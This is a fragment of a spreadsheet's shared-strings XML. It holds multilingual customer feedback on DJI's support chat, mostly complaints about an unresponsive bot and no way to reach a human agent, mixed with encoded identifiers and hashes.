    <t>3Zzpxe+XeLVfq/WdduEG7WfbagUfAYHnUSimO3pwnCs=</t>
  </si>
  <si>
    <t xml:space="preserve">Very quick and easy to understand. Polite and helpful </t>
  </si>
  <si>
    <t>53M+4pqYDP53PfRQvoUgn+hRLGRsDFD9YPDJRNnFXhI=</t>
  </si>
  <si>
    <t>53e22c89dfd7f41542091069180dce9c</t>
  </si>
  <si>
    <t>|82575271202444885153119</t>
  </si>
  <si>
    <t>xPug+KdNSB+UHVv0LQaekw==</t>
  </si>
  <si>
    <t>Die selbe Antwort, die nicht hilft auf anders formulierte Probleme.
Leider noch sehr ausbaufähig</t>
  </si>
  <si>
    <t>Zqjzxcr6GGZhn6jWQJqj3TT1k9I73K5e4LsZYer57RY=</t>
  </si>
  <si>
    <t>117d3374b9e2db81f1eb4f70f8a78669</t>
  </si>
  <si>
    <t>|82575663637339434135712</t>
  </si>
  <si>
    <t>FGGPrr20kjszGwP5WptbZA==</t>
  </si>
  <si>
    <t>can't talk to any body</t>
  </si>
  <si>
    <t>8iTh/0gh9eobHa+EoFcwRgcKhwtCdkInHs4Hp+eNEUs=</t>
  </si>
  <si>
    <t>587fa8d3c649722da24d5ad671d918ed</t>
  </si>
  <si>
    <t>|82575367970937354879736</t>
  </si>
  <si>
    <t>tEZxwT9EZJwBhqM9vj5VIOxaA3RNWmwxSrsg9PQSO8k=</t>
  </si>
  <si>
    <t>Neo wont connect to phone. This didnt help at all</t>
  </si>
  <si>
    <t>Xs7fRsqlRHVmpsNK/z67O9gis4Sv1+z1mgiAfJhWAvY=</t>
  </si>
  <si>
    <t>0c05de7d0ca834ffb42c3d2e1ef28451</t>
  </si>
  <si>
    <t>|82574588227757095239033</t>
  </si>
  <si>
    <t>nv17C2+Slu6KgRy/qX6rSqbxHRR5JHiAwU2lX6SvG2A=</t>
  </si>
  <si>
    <t>Servizio virtuale inutile</t>
  </si>
  <si>
    <t>l1ZQS35HDeI95NBW8vvTgrrQZiPoyQfcHqlNZE9paqg=</t>
  </si>
  <si>
    <t>aa7dcb26223580782f61616bef93667f</t>
  </si>
  <si>
    <t>|82574435163656304315733</t>
  </si>
  <si>
    <t>oWfg01iWrRBPBHMdIEgnMg==</t>
  </si>
  <si>
    <t>No reply to my actual question</t>
  </si>
  <si>
    <t>Kdv6xl9i34GOAA/wI0svEQ==</t>
  </si>
  <si>
    <t>c8c73787ced50a35b745435cc8f0a0c3</t>
  </si>
  <si>
    <t>|82575901647816514968725</t>
  </si>
  <si>
    <t>aeARiZi2MX4hi1taSwq+5A==</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>uwYigzi/BP55pLfk/uAWPMF9284XjhEHHkEdRHSmzPw=</t>
  </si>
  <si>
    <t>523c8d03a1e1ec4d49a8e18e1459b8a3</t>
  </si>
  <si>
    <t>|82574251465457493217674</t>
  </si>
  <si>
    <t>U7qUi+qFAWS800RdgEDhQA==</t>
  </si>
  <si>
    <t>They were busy so I had to walk away from the computer but when I got back, they answer my question.</t>
  </si>
  <si>
    <t>swF59UM/H31qPUvshFcphBJL7wZbS5Obhy5XcyQ/jzU=</t>
  </si>
  <si>
    <t>9f939e005d7a098835613b4fe4a4dc92</t>
  </si>
  <si>
    <t>|82574150850358513192075</t>
  </si>
  <si>
    <t>AaQIPS8GcyzaOHN3FEWJ+mFcS84X11eYS7bR4krEWs8=</t>
  </si>
  <si>
    <t>He wasnt an expert but a bot.</t>
  </si>
  <si>
    <t>lUhX8Dbj3qijPEqN9nmsG8YsZl3hGjh9KMPpJoIdQbQ=</t>
  </si>
  <si>
    <t>4d9320fb295ac16d85b6f79643ba5425</t>
  </si>
  <si>
    <t>|82573638515658260354075</t>
  </si>
  <si>
    <t>RRhD6axJqCbD04mLfX99tg==</t>
  </si>
  <si>
    <t xml:space="preserve">Ich habe Ihnen eben eine Reperaturandrage geschickt, wie lange dauert die Reperatur </t>
  </si>
  <si>
    <t>AHEvJrmTdcivBb+3UxPndJdH7teXp4Kj3Pt5A8SGSug=</t>
  </si>
  <si>
    <t>73234c22a25536441b5f2dae242d34ab</t>
  </si>
  <si>
    <t>|82572775422486778785361</t>
  </si>
  <si>
    <t>f4CpgHve1RxxOdHyo2/cj0lFxdHdn68G1zE5WIyUswA=</t>
  </si>
  <si>
    <t>Impossible d'utiliser mon mini2 après une changement de portable et la nouvelle version d'android.</t>
  </si>
  <si>
    <t>Ngl9CIbFNXAOfIBTErTFTrkKhVP7onW+aXR8eq3MiWE=</t>
  </si>
  <si>
    <t>6b15b106a52241fa85a46db0c95e41de</t>
  </si>
  <si>
    <t>|82571511348988518678815</t>
  </si>
  <si>
    <t>uR7Nn7R8gDxPgR1Vnrg5NUUJMxwGkrbo9yDj7kB/CAQ=</t>
  </si>
  <si>
    <t>Never was able to get an answer to my problem....frustrating</t>
  </si>
  <si>
    <t>XKY/wDqNpMJ/wtTqCyv5Q6yjYroGYHK8M16JI6FIW3A=</t>
  </si>
  <si>
    <t>8a84b82fb6baef70ae9cba090b8e5a4a</t>
  </si>
  <si>
    <t>|82572023610895580044102</t>
  </si>
  <si>
    <t>yG8NHwpYGKZmcV5lreDtjLzTzB4gYdqpEv32x/z8HDE=</t>
  </si>
  <si>
    <t>You need to help us.</t>
  </si>
  <si>
    <t>J/mPFFKSTWmnesGJn2DGUAqxtYFsbNs6vV5FpR9vFIQ=</t>
  </si>
  <si>
    <t>94efdf4e1984deb0455286031f1b5233</t>
  </si>
  <si>
    <t>|82571840437794787745857</t>
  </si>
  <si>
    <t>pis15Dl7OgW3s7R3NmjZXp3oXzLhTbt0qpyDiD1MP9HWB9z4fASUBPYl44gXkQdX</t>
  </si>
  <si>
    <t>no information</t>
  </si>
  <si>
    <t>Cu4OWnHBAhd6UXakYRSWmkIPD7DJ45PmSiKEkqEUhxU=</t>
  </si>
  <si>
    <t>7246cc2136ae00082f684a685c51a65e</t>
  </si>
  <si>
    <t>|82570029897303165334897</t>
  </si>
  <si>
    <t>RrnGtD9jXSvGNeZuqCZVIQ==</t>
  </si>
  <si>
    <t>Beim Kauf der Drohne Mini 4 Pro Fly More Combo (DJI RC 2) hätte ich Über 70 € weniger bezahlt !!!!</t>
  </si>
  <si>
    <t>PAWAJhWeQ1kvZigGli+cRSAy63hVqKGwbioWONCRvVE=</t>
  </si>
  <si>
    <t>0ef16f8243d205304a8336633ca393cc</t>
  </si>
  <si>
    <t>fr_sp3</t>
  </si>
  <si>
    <t>|82569927930576211797495</t>
  </si>
  <si>
    <t>5FJvk2RBLic2siovXrs1sZhx4tgAtQugYx+yVF2J9tk=</t>
  </si>
  <si>
    <t xml:space="preserve">Réponse rapide et Précise. </t>
  </si>
  <si>
    <t>4dpXGnKN6Ki+XkWHsQu2CFRzkNJr14M4249Rn488ioQ=</t>
  </si>
  <si>
    <t>b38713f472e3220a3315c3dd414f49cf</t>
  </si>
  <si>
    <t>|82569868214834680197302</t>
  </si>
  <si>
    <t>RQ1LZ8OK4y3eEP5heDOCjq+CAV3okG07xJACQ55kHeA=</t>
  </si>
  <si>
    <t>Hi I have just received my drone, it is not working as will not connect .  error code 0xfff</t>
  </si>
  <si>
    <t>xwWsMlQHcAp/4/NGj83yDJfij57pA0/oEBVzD6rkpjk=</t>
  </si>
  <si>
    <t>ab01c019a310a599f31f514c015ad9e8</t>
  </si>
  <si>
    <t>na_agp01</t>
  </si>
  <si>
    <t>|82570877687139145246836</t>
  </si>
  <si>
    <t>SiC3rsCuzYvEn1FbwvwZLg==</t>
  </si>
  <si>
    <t>苹果系统进去就是英文</t>
  </si>
  <si>
    <t>WbtZyGPd6n6mfjUUhIb7RsBihTr7nFrJKYSZgjRmehA=</t>
  </si>
  <si>
    <t>00f69b449da51d215e83c4daf0383592</t>
  </si>
  <si>
    <t>|82570365586707120342264</t>
  </si>
  <si>
    <t>pTwiE44VuCxbNmYllY4R9Q==</t>
  </si>
  <si>
    <t>hppy</t>
  </si>
  <si>
    <t>LGgrxNb2cfziQmx1L954B3D2YNrrTWSGlCq5K9rJts0=</t>
  </si>
  <si>
    <t>c21800ca5377d1d445a5489f891509de</t>
  </si>
  <si>
    <t>|82569001731855797682199</t>
  </si>
  <si>
    <t>rpcTxvxNP1S6LOCa74lVgw==</t>
  </si>
  <si>
    <t>SCHEI? AUF KI</t>
  </si>
  <si>
    <t>cNHPs1q71H60Cin4rLG2GKUS7MVPqdibKiPx5VhqgK0=</t>
  </si>
  <si>
    <t>a01cbbfe63e7127fc9d363f4ce2c55c6</t>
  </si>
  <si>
    <t>|82569303563345341043458</t>
  </si>
  <si>
    <t>vvhc21/T4pslnMttun9Jjg==</t>
  </si>
  <si>
    <t>I want to chat with a live agent</t>
  </si>
  <si>
    <t>ZHinSXlKapwZu6/UiW8VQyeIzm76fy3b6QV3eE+Qeh4=</t>
  </si>
  <si>
    <t>01ca337e52e06be87d770f42c3e0a67a</t>
  </si>
  <si>
    <t>|82569300320955279624784</t>
  </si>
  <si>
    <t>does not respond to my question</t>
  </si>
  <si>
    <t>dfbaf346053e9a5a2d9e92393399c96d</t>
  </si>
  <si>
    <t>|82569840506503988741520</t>
  </si>
  <si>
    <t>XfzDNmuSMZAdfWFbrF3vyg==</t>
  </si>
  <si>
    <t>CANNOT TAKE OFF</t>
  </si>
  <si>
    <t>ksfv1QUckx+bjOTdDWp05Z9MYpjZCw2cEflHqYA6e50=</t>
  </si>
  <si>
    <t>0ef801c70e5f1b320f44ab53bfa583d4</t>
  </si>
  <si>
    <t>|82569583634751092854783</t>
  </si>
  <si>
    <t>pHZ/n15f2RKfyvr/njvp/Q==</t>
  </si>
  <si>
    <t xml:space="preserve">hello my dji mic 2  volume knob is missing </t>
  </si>
  <si>
    <t>L5a6BaUIgRyOxuU1goxGo6plJ74ThDghEGDzqftRFME=</t>
  </si>
  <si>
    <t>4d764cb69fb31f49f5c564431c093ab0</t>
  </si>
  <si>
    <t>|82569221509753605888867</t>
  </si>
  <si>
    <t>osclEvwdh3Sk5S7QsfR1hQWTt7QV23SFpTSRlO/ztlw=</t>
  </si>
  <si>
    <t xml:space="preserve">This is not acceptable customer service - you keep ending chat without responding </t>
  </si>
  <si>
    <t>3xrPtODJ2HFHB9hVXUntYqIO/Bf4sPkNMIGr3G17b8Y=</t>
  </si>
  <si>
    <t>58fcaba2f52940adfaa0762caa1d0deb</t>
  </si>
  <si>
    <t>|82568976230346141991070</t>
  </si>
  <si>
    <t>hKznalLga3la7W0QJm3DNGGniJcDXyxWudG6Dd5QtDM=</t>
  </si>
  <si>
    <t xml:space="preserve">Not connecting me </t>
  </si>
  <si>
    <t>0hWSv9bsT5kB1G9Mhs3OXskLVP2QWksBTkdVVI+TlS4=</t>
  </si>
  <si>
    <t>4b9c5d06bf5ccc6909b2958237d61cef</t>
  </si>
  <si>
    <t>|82569293270435106647648</t>
  </si>
  <si>
    <t>zzv/L+uPBlP+D7jbT1nuHFW3k6W9fW0MUTqk7W7ZHAU=</t>
  </si>
  <si>
    <t>every time i typed a question etc i would see ... then it would disappear with no reply from DJI</t>
  </si>
  <si>
    <t>FquVdbRJIbwpJRqTyUenz+PuhpfPpiej5qqBIbPPT5M=</t>
  </si>
  <si>
    <t>2f11d1090d9b4457fc0bdf38e0ed65ff</t>
  </si>
  <si>
    <t>|82568910159503637668567</t>
  </si>
  <si>
    <t>3fv9lpewlU8RwHffBkAoZkNlJm0I1mcI7dekqpk0yNc=</t>
  </si>
  <si>
    <t xml:space="preserve">Dod bot answer my question </t>
  </si>
  <si>
    <t>LR4l3otUQsTsNVKJh1y5F9hYvqVU+oSS/+8Xy4E2T4s=</t>
  </si>
  <si>
    <t>e8a746b5bf0cdb572ac74f95bb4683b8</t>
  </si>
  <si>
    <t>|82569336872496416228165</t>
  </si>
  <si>
    <t>EHkkXv++AIL//kCb9KRmCA==</t>
  </si>
  <si>
    <t>The system didn`t recognice my new drone. What now?</t>
  </si>
  <si>
    <t>hsKJaPhev4KHdDZBpZeI4r+JHyfY+iRGzDBLaXlZcUA=</t>
  </si>
  <si>
    <t>802d154c5364cebad9d063f127d2fb76</t>
  </si>
  <si>
    <t>|82569221709343616315384</t>
  </si>
  <si>
    <t>CNImm7opWbc8yjSY5dH1XKyjQULDXZQNfpXPtP3/6QA=</t>
  </si>
  <si>
    <t xml:space="preserve">want to speak to an associate and it won't connect me </t>
  </si>
  <si>
    <t>9fF6i9BXxseBdm1aCMJz/khpMtqYImmsuclPN4d3GcU=</t>
  </si>
  <si>
    <t>1b11c0cc73b9e4a67c061e4ee1ce8408</t>
  </si>
  <si>
    <t>|82569276469834778555767</t>
  </si>
  <si>
    <t xml:space="preserve">No response </t>
  </si>
  <si>
    <t>52f990c01c5779f56661387fe61139a0</t>
  </si>
  <si>
    <t>|82569345796215917570494</t>
  </si>
  <si>
    <t>8ygYAlQWWVXHQ0tt3LHOMkIkDNkWOCYpYZFhQyAuFmA=</t>
  </si>
  <si>
    <t>chat didnt work out</t>
  </si>
  <si>
    <t>tVog2egfJVhIPlhUTdfQmLwafAFWQaxDXputeMmnorE=</t>
  </si>
  <si>
    <t>e8b3c72c7fd3bb79cf7efb234a521675</t>
  </si>
  <si>
    <t>|82569278569044726091548</t>
  </si>
  <si>
    <t>MGSPY1oa2zDPi7eP9E0O6D0uOMWYYviBxm2HQzLtXv0=</t>
  </si>
  <si>
    <t xml:space="preserve">hello
</t>
  </si>
  <si>
    <t>fLFmEOPCAjrn+eoCBrPk79G6evs6L0YsjgwvwfbYQMs=</t>
  </si>
  <si>
    <t>4b4bd8ec030b823d2353a08481a7d9a3</t>
  </si>
  <si>
    <t>|82569218721493634832337</t>
  </si>
  <si>
    <t>EQw5wF/1TfWi3v7Q86nUqStMymnRAnmSYKWw4DAbHUs=</t>
  </si>
  <si>
    <t>no agent is responding</t>
  </si>
  <si>
    <t>voqDpjSNIicqNC3iTvs7cq9rp7QyEx51tOC1vBT9jCY=</t>
  </si>
  <si>
    <t>4ad3bb6e268d52b5c8c4d538fc457b59</t>
  </si>
  <si>
    <t>|82568958419764791774867</t>
  </si>
  <si>
    <t>M1SRi2ds6EwbdKyPh6nPIYnXbrRA71ECsunyjqfQ/U8=</t>
  </si>
  <si>
    <t>doesnt even respond and is broken as hell</t>
  </si>
  <si>
    <t>B0UssAtJIx4LRLEEQXAjivqMkCkdk+s2sSUVtvoLM3o=</t>
  </si>
  <si>
    <t>0cedc3780070de5e02dc65e1da83ba97</t>
  </si>
  <si>
    <t>|82569265286084434932644</t>
  </si>
  <si>
    <t>8112c3be736c66b424adf88d178e7cb9</t>
  </si>
  <si>
    <t>|82569353917386838372034</t>
  </si>
  <si>
    <t>G7I+hwJ5mT0SvD4drqAozHtEp0P0LWItNHG6LJxy5Ck=</t>
  </si>
  <si>
    <t>Page is too busyt with irrele4vant rubbish and keeps changing</t>
  </si>
  <si>
    <t>lRpXzWOP/VS7YDIKWeb9wRMJuoQQp2tqnfnEZY/g110=</t>
  </si>
  <si>
    <t>51362d8849bf1b31f2df0ca6fa559b93</t>
  </si>
  <si>
    <t>|82568797529663499210852</t>
  </si>
  <si>
    <t>1XwtF2Gj034Wx8z2ddyZHYpahTJ0/nBl1TqMetlxxq0=</t>
  </si>
  <si>
    <t>I am not getting any help</t>
  </si>
  <si>
    <t>xVO9yBk4UzBtW2PKdtceoohz+AyIIsfkX0aKVj6HJFc=</t>
  </si>
  <si>
    <t>1ec2935e5742c3a237fa74d54c3d117a</t>
  </si>
  <si>
    <t>|82568809199781652157014</t>
  </si>
  <si>
    <t>Ad6cuIVF9XPgLA2IEwvlasnqo7dXDz8IvQXRNaZ609Q=</t>
  </si>
  <si>
    <t xml:space="preserve">
No response</t>
  </si>
  <si>
    <t>W97mO9TWqVYfwZkRJq+DYGn5O8QN2+5vlGI0a1h7AKo=</t>
  </si>
  <si>
    <t>c3e33047aad81981cc3d9ba831dae328</t>
  </si>
  <si>
    <t>|82568768333893254564079</t>
  </si>
  <si>
    <t>s6e+ZLpHNxkalhwL8oXtCE5Qu1JTvvtc33zPgqWFXJYTZqMNGhKpGT4jcG2SBw6Q</t>
  </si>
  <si>
    <t>Try responding maybe?</t>
  </si>
  <si>
    <t>0brS1PPRqcSz2NUKZig7ol1WOzmXBwzNMf3UnXqT3vs=</t>
  </si>
  <si>
    <t>f2aa5408a39b0bfa5811adb2a8849bd2</t>
  </si>
  <si>
    <t>|82568766305641092561856</t>
  </si>
  <si>
    <t>10C59Qpb2WRMlc1Z0UoKlQoa1mmQJWEqXPgtym00aZ4=</t>
  </si>
  <si>
    <t>It keeps looping back, deleting my questions and not answering anything- I am still missing my order</t>
  </si>
  <si>
    <t>r/cVBAG6VFQFVnXnvRchPUnfOD1D3Ph/0Tt3q1RVo2k=</t>
  </si>
  <si>
    <t>92fe9ca6c7d02bad61189fe85ccdd480</t>
  </si>
  <si>
    <t>|82568721260752738068848</t>
  </si>
  <si>
    <t>TosWQXdQ/JO610eHhLZy2g==</t>
  </si>
  <si>
    <t>No help at all!</t>
  </si>
  <si>
    <t>SfRFgNMC0OW0W4WHQiuMbYn7hC7T955UgiLITDwoj/I=</t>
  </si>
  <si>
    <t>745574bb50921935be0cee2ffa165ea0</t>
  </si>
  <si>
    <t>|82569599253438956631336</t>
  </si>
  <si>
    <t>Ojj36bNnFVQkBZtJ/CAbMhjY7ZriIPDSpSK5E1Tb544=</t>
  </si>
  <si>
    <t>wwwww</t>
  </si>
  <si>
    <t>YaFD/wTVcxkeD1ElAU1Kg5UhL1MR1UwqvWBjHrG3y+8=</t>
  </si>
  <si>
    <t>c9c09b307b95aaa4f2a04986ab4cf8db</t>
  </si>
  <si>
    <t>|82569357288686898845610</t>
  </si>
  <si>
    <t>uZx1dZuA1JC1NPzPHCUhT1ATo4HAwUYcGgoD5B52njo=</t>
  </si>
  <si>
    <t>Got no reply to my message</t>
  </si>
  <si>
    <t>b0WzRsAuJG2uv7bBGVUBVvQTAI3RnjCIcLebilzucKY=</t>
  </si>
  <si>
    <t>c94637c587d9916140bf99e1ec9095a6</t>
  </si>
  <si>
    <t>|82568096650914990021968</t>
  </si>
  <si>
    <t>+Vm0fYn7L13EM0i3IRO3MBw3GbRoK15GQM75azcM+CM=</t>
  </si>
  <si>
    <t>Quick</t>
  </si>
  <si>
    <t>po6KhE8ja0puAeixJDquoTIdJzzX90A30381ioQ9uFs=</t>
  </si>
  <si>
    <t>6a9af72309559b5b73c562fbc8e5cdd1</t>
  </si>
  <si>
    <t>|82568090759454841822783</t>
  </si>
  <si>
    <t>/tfLfwLoRb7gVTMIt9pZbOhZq7P+M6mMEKGk5GPiFb8=</t>
  </si>
  <si>
    <t xml:space="preserve">Was not able to solve my problem. </t>
  </si>
  <si>
    <t>YuE7zfuZjjyD1+kxBVSjgg==</t>
  </si>
  <si>
    <t>6037bb98a4af59686778734db5c314d4</t>
  </si>
  <si>
    <t>|82567526277266983220485</t>
  </si>
  <si>
    <t>RBWNjPhKtU0/cHzVMQ0HNwVPoVIw40PdHqFGkaLQhcg=</t>
  </si>
  <si>
    <t xml:space="preserve">You need to start answering ... Not only cut-and-paste some random shit </t>
  </si>
  <si>
    <t>gpDlEkqJgnCAdMC3JzXS8GALGyewoJx/8aWjCTJPQtE=</t>
  </si>
  <si>
    <t>2bcc7920ce137a6ada982831f0499c0c</t>
  </si>
  <si>
    <t>eu_sp3</t>
  </si>
  <si>
    <t>|82565644081415848817995</t>
  </si>
  <si>
    <t>g5cMUXPy79KchElS+eykSQ==</t>
  </si>
  <si>
    <t>Alles top 5/5 !!!!! Danke schon !!!!!!!</t>
  </si>
  <si>
    <t>eEsl+2X+d6dkjJmXSS7TP4ip2jaKRPCLnWWw/k8kWBg=</t>
  </si>
  <si>
    <t>ded2626d691e06d521b53ffcc2328d93</t>
  </si>
  <si>
    <t>|82565378367116588741513</t>
  </si>
  <si>
    <t>QDDzHbfpf4lB+DCGH5vgx1lb+PL8BFzt8+sSKNxtAOs=</t>
  </si>
  <si>
    <t>A response would be good</t>
  </si>
  <si>
    <t>jN4C41kPGJFD1ArjZvxR4UfFEbpp+jWhwEqesonL2ic=</t>
  </si>
  <si>
    <t>bac539aa127da3be5817a55d82c335a1</t>
  </si>
  <si>
    <t>|82565261198035137446975</t>
  </si>
  <si>
    <t>Tr3BWuY9FHlkwEyqzLOK7Y/5rNfwL2IpWjYOAvJhBi0=</t>
  </si>
  <si>
    <t xml:space="preserve">noooo I just bought this drone a week ago and had collision damage. what do I do? </t>
  </si>
  <si>
    <t>ai+BZBDyIBQJUsHAVlhMZv23paKsivt8TNhWukJNA0w=</t>
  </si>
  <si>
    <t>0b2638c344a6b2b2d17db5cf6d98ff0e</t>
  </si>
  <si>
    <t>|82564814381476458193648</t>
  </si>
  <si>
    <t>DFlB6tOLqWv8NjWrYi6uQqZnJQjO5gGX3NluH+Q4+Hk=</t>
  </si>
  <si>
    <t>my request was totally ignored</t>
  </si>
  <si>
    <t>xuVVNi6x0GB/Tvpl6exGPnZ/AOBJMXMXHjIVmnJVwB0=</t>
  </si>
  <si>
    <t>d7ee7cb69e4390d48e33c036145934d2</t>
  </si>
  <si>
    <t>|82564609722371022713395</t>
  </si>
  <si>
    <t>n5QjWs6pcY32hNRDsYM0Ng==</t>
  </si>
  <si>
    <t>I'm not receiving any response from a virtual assistant.  There is no acknowledgement of my question</t>
  </si>
  <si>
    <t>VOwOgfniosELX+UEOLvVzA==</t>
  </si>
  <si>
    <t>a8a40d3e0e8a8d31ed0195461bc0f083</t>
  </si>
  <si>
    <t>|82563782930177634796242</t>
  </si>
  <si>
    <t>nFD1gW9X/mAyQYjK9DcqlA==</t>
  </si>
  <si>
    <t>Is there any way to buy the receiver for the mic mini 2?</t>
  </si>
  <si>
    <t>c1zXr5Ym855XkMWltopLcY2CAIrwljpAlcIkOP29j+Q=</t>
  </si>
  <si>
    <t>79eca02d2f1cd369d785f00c2cc81896</t>
  </si>
  <si>
    <t>|82563648830585390322534</t>
  </si>
  <si>
    <t>JHOQEoIPelGuwkboPzyhT7gG4rWfyVclelg3lxZicLY=</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, im trying to get an update on a case I filed. </t>
  </si>
  <si>
    <t>rHfZD39ZmX/bpRx4V+tuMaSZkSlj9QpZMBGt7PhY+Cs=</t>
  </si>
  <si>
    <t>417bc8a7e255e19d04f86a52f744bf81</t>
  </si>
  <si>
    <t>|82563806086278059644953</t>
  </si>
  <si>
    <t>ZIpmza3/3UjCJZ7Q8+u28KNGvNNor2ce2Pp3Yt4SV8c=</t>
  </si>
  <si>
    <t>Hello, I am writing to you regarding the case number.
CAS-21072083-D7K6S9</t>
  </si>
  <si>
    <t>Ag2G/sGxwP5i1sz5eKo+KjAPehpVCBjfcpfA69ujSdQ=</t>
  </si>
  <si>
    <t>391af477a573a91b39bbfd0ed7a28422</t>
  </si>
  <si>
    <t>de_fly1</t>
  </si>
  <si>
    <t>|82563624611569586619857</t>
  </si>
  <si>
    <t>H1iHitgHjUuXqM1f/Jqlt7ewaIUuqCKogptcF63D0eA=</t>
  </si>
  <si>
    <t xml:space="preserve">Mein Motion 3 controller funktioniert nicht </t>
  </si>
  <si>
    <t>QLAyBi8vHsFk+w0TNpXeYx9JnmiowUDAgU0njTdd0ek=</t>
  </si>
  <si>
    <t>d5f7f3671530cdf71e3c38c16db3d983</t>
  </si>
  <si>
    <t>|82563156537671791448306</t>
  </si>
  <si>
    <t>EG8nVvu+4MbaNJZ4VU90I/GIlwPPL2cbF+q/zPyy2m4=</t>
  </si>
  <si>
    <t xml:space="preserve">No acknowledgement of ?. Incomplete refund provided after nearly 2 hours on hold and on the phone 
</t>
  </si>
  <si>
    <t>LAeDGCI7EFvTSmwy1nK+w1POjU/hrPeBzsohaiKPq14=</t>
  </si>
  <si>
    <t>184435df89f37400f9e2110068d384ab</t>
  </si>
  <si>
    <t>|82563026519261135672529</t>
  </si>
  <si>
    <t>7IC3GiqzyQtmK5bLYbtwKg==</t>
  </si>
  <si>
    <t>It was awful, online, call center could answer my question.</t>
  </si>
  <si>
    <t>a7M1yeLsEXYmrwAdVKgwtU1aaFNCJW3HjPZHRSVJ+ek=</t>
  </si>
  <si>
    <t>865e5bbccea4a5a372366f3ef78895ba</t>
  </si>
  <si>
    <t>|82562690914871343343133</t>
  </si>
  <si>
    <t>Y0r1g0ji7ZqwIz+RLKSTCSalI5Me+x3V9hphy8KhwjQ=</t>
  </si>
  <si>
    <t>It needs to offer solutions that actually work.</t>
  </si>
  <si>
    <t>ubqi52W90rGA31BME7TcjRJEznA20B+OQQLhFz+dPAw=</t>
  </si>
  <si>
    <t>16a515f7a7564cce012a69ff1b3ebd11</t>
  </si>
  <si>
    <t>|82563009339716856161545</t>
  </si>
  <si>
    <t>+2z+K5GiUul5A8d3uRwmRA2idxFHjTpc0GYkgbfeV0E=</t>
  </si>
  <si>
    <t>DJI has bad customer service. I will not buy DJI brand products anymore.</t>
  </si>
  <si>
    <t>kXlY4AIMktHZFAUaXrtjz5g/ZyGxya0p1R1KQZlhcOM=</t>
  </si>
  <si>
    <t>966f659f217ecfac3b129e2a6afa8e8b</t>
  </si>
  <si>
    <t>|82562429551756754082763</t>
  </si>
  <si>
    <t>Z0hLc9dpOyPQu9KkSshfQUf9P0piblL7VUA9Z6foVZM=</t>
  </si>
  <si>
    <t>Your automated service bot definitely did a great job. 
I then quickly fixed the problem.</t>
  </si>
  <si>
    <t>5eoifcSTW3FeN5gxTBbhcHEFP9ZggzF7q7HlkaYZ5PA=</t>
  </si>
  <si>
    <t>901cc2ed0bccc61cc40525e737e3b603</t>
  </si>
  <si>
    <t>|82562334674814696272033</t>
  </si>
  <si>
    <t>zYr0OLNyTt4WYE0rbIp0YA==</t>
  </si>
  <si>
    <t>LFlho0iDGrxHNwgLakr4pQDWknMGZ2aOzg83h4r+6/E=</t>
  </si>
  <si>
    <t>d06cfba40562f9f3f8b8cae4d9036ab5</t>
  </si>
  <si>
    <t>|82563058988468000278909</t>
  </si>
  <si>
    <t>5wOFOBSFY4kMWOu3wU2b6oJeV1UOCJMO0PR5UteetKU=</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>Klun+8SOTCA6sLZO5nqMgEWvUjWBMcJg8EgF6m8Dod0=</t>
  </si>
  <si>
    <t>f60ad4cb12401075302d75c0ecb12c76</t>
  </si>
  <si>
    <t>|82562072699088347041116</t>
  </si>
  <si>
    <t>R94fg+uJTXsaup/whPCMDRuBfAn4GOmjjKMyy6IXWlo=</t>
  </si>
  <si>
    <t xml:space="preserve">Couldn't get a human
</t>
  </si>
  <si>
    <t>FfQ+n6BC2ozQkka+rP76cPx+HDlKLdSZekRjsgjXjAo=</t>
  </si>
  <si>
    <t>04e93c3df51ff65d15084c7ccda59c69</t>
  </si>
  <si>
    <t>|82561865010635068520856</t>
  </si>
  <si>
    <t>R1OTIDCwjeblcPcRA23nfg==</t>
  </si>
  <si>
    <t>i want to have the actual date of item shipping</t>
  </si>
  <si>
    <t>zI0Ufbw+ket2XfXg9fFRDInBpJ9evRO+XQgbzvQlphU=</t>
  </si>
  <si>
    <t>bb58b131321afe28016364d32e52fcae</t>
  </si>
  <si>
    <t>|82561801007274467933216</t>
  </si>
  <si>
    <t>GrKYa4iHbW2Mp7XKt8xwDG4AP1L8CVsS8jHvRwTkNW8=</t>
  </si>
  <si>
    <t>The attention was the best and they were able to answer all my questions. I am very grateful.</t>
  </si>
  <si>
    <t>Oxk7McA8IU7p+kovitVaHfg64yqog/whHWvzm6c7MKI=</t>
  </si>
  <si>
    <t>66e07d19d0549160e0ae0994f3b9893e</t>
  </si>
  <si>
    <t>|82561263262687343288298</t>
  </si>
  <si>
    <t>访客-aa2d5d</t>
  </si>
  <si>
    <t>Vous mettez "cliquez ici pour...", sauf qu'il n'y a aucun lien</t>
  </si>
  <si>
    <t>35069da94284f34adcd8bcd05f5d2102</t>
  </si>
  <si>
    <t>3f2fae327bfec4cd47a08cd5df24946b</t>
  </si>
  <si>
    <t>es_sp10</t>
  </si>
  <si>
    <t>|82561105548625400130130</t>
  </si>
  <si>
    <t>mQZoIoC2HmgbkZ3z8riysQ==</t>
  </si>
  <si>
    <t xml:space="preserve">hola tengo problema de activacion para el m200
mando numero de serie 0FZDFB60P30067
me da error </t>
  </si>
  <si>
    <t>zuygLoX3E8IAmIDWuSYPZcxYjHKyrvu7fvEMlPGxjFc=</t>
  </si>
  <si>
    <t>ba8deeccea127fa39eedd90df5927c5d</t>
  </si>
  <si>
    <t>|82559542419474097098295</t>
  </si>
  <si>
    <t>7+9+pe0bM1UIJmDFk91XvnkGKq8nAfZauFct9aJ3q8I=</t>
  </si>
  <si>
    <t>I know I have DJI Care Xpress, but I don’t know what I am supposed to do with my crashed drone</t>
  </si>
  <si>
    <t>mewEfmp5oDlmw7fk/fNVaKpgUh0VsEb60YZoICzYKNA=</t>
  </si>
  <si>
    <t>c4a99ea9d9d4753d03dda240f5aab2aa</t>
  </si>
  <si>
    <t>|82559772567702891167314</t>
  </si>
  <si>
    <t>roF8Qgvr3Rg5tAVNQeFgbL8l5iZoLyPCZhfcFgV0dl8=</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,How can i install the DJI fly app on my Samsung S25?
</t>
  </si>
  <si>
    <t>NWEzdWGTvjxszzLLenDv+t1lcKr5jKhSZAveZc3zFv8=</t>
  </si>
  <si>
    <t>208bfd679afc25ad7a7613597f715e47</t>
  </si>
  <si>
    <t>|82559415161189841443893</t>
  </si>
  <si>
    <t>0GV3C2y1gHypPX6nRqBJkHNnTVagnGFGHvTuYjxDXrc=</t>
  </si>
  <si>
    <t>Everything!</t>
  </si>
  <si>
    <t>HvOwouqTUggws5G3zw0AK7uJaewNDf2Pu8jO7T8wO2U=</t>
  </si>
